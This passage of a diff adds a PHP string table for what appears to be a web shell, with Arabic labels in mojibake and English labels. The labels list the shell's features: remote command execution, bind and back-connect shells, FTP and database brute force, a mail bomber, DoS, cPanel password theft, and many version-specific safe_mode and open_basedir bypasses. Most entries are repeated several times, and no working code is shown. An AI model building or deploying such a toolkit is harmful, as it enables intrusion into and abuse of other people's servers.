5.1.2)', +'ar_text115'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'ar_text116'=>'Copy from', +'ar_text117'=>'to', +'ar_text118'=>'File copied', +'ar_text119'=>'Cant copy file', +'ar_text120'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'ar_text121'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'ar_text122'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'ar_text123'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'ar_text124'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'ar_text126'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'ar_text127'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'ar_err3'=>'Error! Can\'t connect to ftp', +'ar_err4'=>'Error! Can\'t login on ftp server', +'ar_err5'=>'Error! Can\'t change dir on ftp', +'ar_err6'=>'Error! 
Can\'t sent mail', +'ar_err7'=>'Mail send', +'ar_text1' =>'Executed command', +'ar_text2' =>'Execute command on server', +'ar_text33'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'ar_text34'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ include function', +'ar_text35'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ load file in mysql', +'ar_text112'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'ar_text113'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'ar_text114'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', +'ar_text115'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'ar_text120'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'ar_text121'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'ar_text122'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'ar_text123'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'ar_text124'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'ar_text126'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'ar_text127'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'ar_text142'=>'Downloaders', 
+'ar_text137'=>'Useful', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'ar_text134'=>'Database-bruteforce', +'ar_text135'=>'Dictionary', +'ar_text136'=>'Creating evil symlink', +'ar_text137'=>'Useful', +'ar_text138'=>'Dangerous', +'ar_text139'=>'Mail Bomber', +'ar_text140'=>'DoS', +'ar_text141'=>'Danger! Web-daemon crash possible.', +'ar_text142'=>'Downloaders', +'ar_text143'=>'Temp: ', +'ar_text144'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ load file in mysqli', +'ar_text145'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via realpath() (PHP <= 5.2.4)', +'ar_text146'=>'Max Interation', +'ar_text147'=>'', +'ar_text148'=>'', +'ar_text149'=>'', +'ar_text150'=>'', +'ar_err0'=>'Error! Can\'t write in file ', +'ar_err1'=>'Error! Can\'t read file ', +'ar_err2'=>'Error! Can\'t create ', +'ar_err3'=>'Error! Can\'t connect to ftp', +'ar_err4'=>'Error! Can\'t login on ftp server', +'ar_err5'=>'Error! Can\'t change dir on ftp', +'ar_err6'=>'Error! 
Can\'t sent mail', +'ar_err7'=>'Mail send', +'ar_text125'=>'Data', +'ar_text225'=>'ÒÑÚ ãáÝ áÊáÊÎØì ãä ÎáÇá ÞÇÚÏå ÇáÈíÇäÇÊ á 4.4.7 / 5.2.3 PHP ', +'ar_text226'=>'ÊÎØì ÇáÓíÝ ãæÏ ÈËÛÑå Root Directory: ', +'ar_text227'=>'ÒÑÚ ãáÝ áÊÎØì ÇáÓÝ ãæÏ ÈËÛÑå 4.4.2/5.1.2', +'ar_text228'=>'ÒÑÚ ãáÝ áÊÎØì ÇáÍãÇíå áãäÊÏÉ ÇáÝì Èì ', +'ar_text230'=>'ÒÑÚ ãáÝ áãÚÑÝå ßáãÇÊ ÇáãÑæÑ áãæÇÞÚ ÇáÓíÑÝÑ ÈÏæä ÊÔÝíÑ ', +'ar_text151'=>'ÊÎØì ÇáÓíÝ ãæÏ È chdir()and ftok() (PHP <= 5.2.6)', +'ar_text161'=>'ÊÎØì ÇáÓíÝ ãæÏ È posix_access() (posix ext) (PHP <= 5.2.6)', +'ar_text147'=>'', +'ar_text148'=>'', +'ar_text149'=>'', +'ar_text150'=>'', +'ar_text159'=>'ãÚáæãÇÊ Úä egy spider', +'ar_text152'=>'ÇÎÑ ÇáÇÎÈÇÑ', +'ar_text153'=>'ÎÑæÌ ', +'ar_text154'=>'æÖÚ ÇäÏßÓ ÓÑíÚå ', +'ar_text155'=>'ÍÞä ÇßæÇÏ ', +'ar_text156'=>'ÚÑÖ ÇáßæÏ ', +'ar_text157'=>'ÇáÊÓÌíá Ýì ÇáÒæä ÇÊÔ ', +'ar_text158'=>'ÇÏæÇÊ ÇáÊÔÝíÑ ', +'ar_text160'=>'ÇáÑÆÓíå ', +'ar_text162'=>'ÇÞÝÇá ÇáÏæÇá æÊÎØì ÇáÓíÝ ãæÏ ãä ÎáÇá ionCube (PHP <= 5.2.4)', +'ar_text163'=>'ÊÔÛíá ÇáÈíÑá Úáì ÇáÓíÑÝÑ ', +'ar_text170'=>' ÊÎØì ÇáÓíÝ ãæÏ æÇáÏæÇá È Posix_getpw(PHP <= 4.2.0)', +'ar_text171'=>' PHP (Win32std) Extension ÊÎØì ÇáÓíÝ ãæÏ æÊÎØì ÇáÏæÇá (PHP <= 5.2.3)', +'ar_text180'=>'ÇÑÓá ãáÇÍÙÇÊß æÇÊÕá Èì ', +/* --------------------------------------------------------------- */ +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_butt3' =>'Bind', +'eng_butt4' =>'Connect', +'eng_butt5' =>'Run', +'eng_butt6' =>'Change', +'eng_butt7' =>'Show', +'eng_butt8' =>'Test', +'eng_butt9' =>'Dump', +'eng_butt10'=>'Save', +'eng_butt11'=>'Edit file', +'eng_butt12'=>'Find', +'eng_butt13'=>'Create/Delete', +'eng_butt14'=>'Download', +'eng_butt15'=>'Send', +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', 
+'eng_text11'=>'Password for access',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>' New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_text30'=>'Cat file',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_text44'=>'Can\'t edit file! 
Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without arch.',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'/etc/passwd',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu)',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
+'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
+'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
+'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)',
+'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
+'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
+'eng_text125'=>'Data',
+'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
+'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
+'eng_text128'=>'Modify/Access file (touch)',
+'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
+'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
+'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
+'eng_'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
+'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
+'eng_text134'=>'Database-bruteforce',
+'eng_text135'=>'Dictionary',
+'eng_text136'=>'Creating evil symlink',
+'eng_text137'=>'Useful',
+'eng_text138'=>'Dangerous',
+'eng_text139'=>'Mail Bomber',
+'eng_text140'=>'DoS',
+'eng_text141'=>'Danger! Web-daemon crash possible.',
+'eng_text142'=>'Downloaders',
+'eng_text143'=>'Temp: ',
+'eng_text144'=>'Test bypass safe_mode with load file in mysqli',
+'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)',
+'eng_text146'=>'Max Interation',
+'eng_text147'=>'',
+'eng_text148'=>'',
+'eng_text149'=>'',
+'eng_text150'=>'',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! Can\'t sent mail',
+'eng_err7'=>'Mail send',
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>' New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_butt65'=>'Create', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute 
via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()', +'eng_text116'=>'Copy from', +'eng_text117'=>'to', +'eng_text118'=>'File copied', +'eng_text119'=>'Cant copy file', +'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! 
Can\'t sent mail', +'eng_err7'=>'Mail send', +'eng_text200'=>'read file from vul copy()', +'eng_text500'=>'read file from id()', +'eng_text555'=>'read file from imap()', +'eng_text202'=>'where file in server', +'eng_text300'=>'read file from vul curl()', +'eng_text203'=>'read file from vul ini_restore()', +'eng_text204'=>'write shell from vul error_log()', +'eng_text205'=>'write shell in this side', +'eng_text206'=>'read dir', +'eng_text207'=>'read dir from vul reg_glob', +'eng_text208'=>'execute with function', +'eng_text209'=>'read dir from vul root', +'eng_text210'=>'DeZender ', +'eng_text211'=>'::safe_mode off::', +'eng_text212'=>'colse safe_mode with php.ini', +'eng_text213'=>'colse security_mod with .htaccess', +'eng_text214'=>'Admin name', +'eng_text215'=>'IRC server ', +'eng_text216'=>'#room name', +'eng_text217'=>'server', +'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul', +'eng_text225'=>'MySQL Safe Mode Bypass 4.4.7 / 5.2.3 PHP ', +'eng_text226'=>'Safe Mode Bpass Root Directory: ', +'eng_text227'=>'Safe_Mode Bypass 4.4.2/5.1.2: ', +'eng_text228'=>'tools for hacker vb ', +'eng_text230'=>'know pass of cpanel ', +'eng_text219'=>'Get file to server in safe_mode and change name', +'eng_text220'=>'show file with symlink vul', +'eng_text221'=>'zip file in server to download', +'eng_text222'=>'2 symlink use vul', +'eng_text223'=>'read file from funcution', +'eng_text224'=>'read file from PLUGIN ', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_butt3' =>'Bind', +'eng_butt4' =>'Connect', +'eng_butt5' =>'Run', +'eng_butt6' =>'Change', +'eng_butt7' =>'Show', +'eng_butt8' =>'Test', +'eng_butt9' =>'Dump', +'eng_butt10'=>'Save', +'eng_butt11'=>'Edit file', +'eng_butt12'=>'Find', +'eng_butt13'=>'Create/Delete', +'eng_butt14'=>'Download', +'eng_butt15'=>'Send', +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on 
server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>' New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_text30'=>'Cat file', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_text44'=>'Can\'t edit file! 
Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without arch.', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'/etc/passwd', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu)', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', 
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
+'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
+'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
+'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)',
+'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
+'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
+'eng_text125'=>'Data',
+'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
+'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
+'eng_text128'=>'Modify/Access file (touch)',
+'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
+'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
+'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
+'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
+'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
+'eng_text134'=>'Database-bruteforce',
+'eng_text135'=>'Dictionary',
